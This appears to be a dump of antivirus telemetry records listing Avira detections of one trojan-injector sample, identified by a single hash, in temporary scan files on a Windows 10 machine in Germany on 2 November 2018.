  Row(detection=Row(filename='avscan-20181102-052944-46aa48bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052944-46AA48BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052950-4a5dd73b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052950-4A5DD73B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052139-25bfa2fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052139-25BFA2FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-4419319c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-4419319C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051328-00f03a02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051328-00F03A02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051329-013f303d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051329-013F303D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051316-f96683de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051316-F96683DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052124-1cae4121', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052124-1CAE4121', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052904-2efea7a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052904-2EFEA7A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052937-4262577e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052937-4262577E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053001-50e679f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053001-50E679F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051330-01cbd050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051330-01CBD050', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051359-135c38e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051359-135C38E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051359-136aff1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051359-136AFF1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052125-1ce28997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052125-1CE28997', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051337-0641fde0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051337-0641FDE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f1847b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F1847B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051357-1241b0c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051357-1241B0C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052956-4dc83172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052956-4DC83172', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051334-04499135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051334-04499135', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051334-04a03924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051334-04A03924', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055302-87d319a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055302-87D319A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051353-0fad1a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051353-0FAD1A8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055301-876bbfc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055301-876BBFC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052911-32a77398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052911-32A77398', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052144-289b5a79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052144-289B5A79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055351-a521f266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055351-A521F266', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052926-3ba7a41e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052926-3BA7A41E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051311-f6b18687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051311-F6B18687', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3e2d1a0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3E2D1A0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052926-3c23962d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052926-3C23962D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051321-fcdf2c59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051321-FCDF2C59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052103-0ff05fab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052103-0FF05FAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051335-05167790', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051335-05167790', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051309-f574c75c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051309-F574C75C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052158-309aa946', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052158-309AA946', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055302-87d6e651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055302-87D6E651', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052911-332cfd85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052911-332CFD85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052111-14c79088', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052111-14C79088', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-3590700d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-3590700D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052154-2ea9bee5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052154-2EA9BEE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051354-100eb309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051354-100EB309', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051353-0fc6e123', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051353-0FC6E123', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-354db06e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-354DB06E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-35518302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-35518302', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-4780a4ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-4780A4EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052933-4012452e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052933-4012452E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-39c39fda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-39C39FDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-2486ed1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-2486ED1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052903-2e104daf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052903-2E104DAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052138-24b7f50c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052138-24B7F50C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-3955ab48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-3955AB48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051305-f317d842', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051305-F317D842', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051305-f360f2aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051305-F360F2AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052123-1c04197d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052123-1C04197D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:22Z'), dt=datetime.date(2018, 11, 2)),
